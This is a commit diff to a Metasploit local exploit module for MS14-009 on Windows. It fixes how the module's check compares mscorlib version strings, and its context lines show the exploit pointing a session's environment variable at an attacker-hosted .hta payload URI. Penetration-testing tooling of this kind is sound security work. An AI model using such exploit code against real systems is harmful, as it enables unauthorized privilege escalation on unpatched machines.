Dont be confident about string comparision

Author: jvazquez-r7

modules/exploits/windows/local/ms14_009_ie_dfsvc.rb

@@ -86,11 +86,11 @@ def check
 
     mscorlib_version = get_mscorlib_version
 
-    unless mscorlib_version < NET_VERSIONS[net_version]["mscorlib"]
-      return Exploit::CheckCode::Safe
+    if valid_mscorlib_version?(net_version, mscorlib_version)
+      return Exploit::CheckCode::Vulnerable
     end
 
-    Exploit::CheckCode::Vulnerable
+    Exploit::CheckCode::Safe
   end
 
   def get_net_version
@@ -161,6 +161,28 @@ def exploit
     session.railgun.kernel32.SetEnvironmentVariableA("MYURL", nil)
   end
 
+  def valid_mscorlib_version?(net_version, mscorlib_version)
+    valid = false
+
+    mscorlib = mscorlib_version.split(".")
+    mscorlib.reverse!
+
+    max_version = NET_VERSIONS[net_version]["mscorlib"].split(".")
+    max_version.reverse!
+
+    i = 0
+    mscorlib.each do |v|
+      if v.to_i < max_version[i].to_i
+        valid = true
+      elsif v.to_i > max_version[i].to_i
+        valid = false
+      end
+      i = i + 1
+    end
+
+    valid
+  end
+
   def primer
     exploit_uri = "#{get_uri}/#{rand_text_alpha(4 + rand(4))}.hta"
     session.railgun.kernel32.SetEnvironmentVariableA("MYURL", exploit_uri)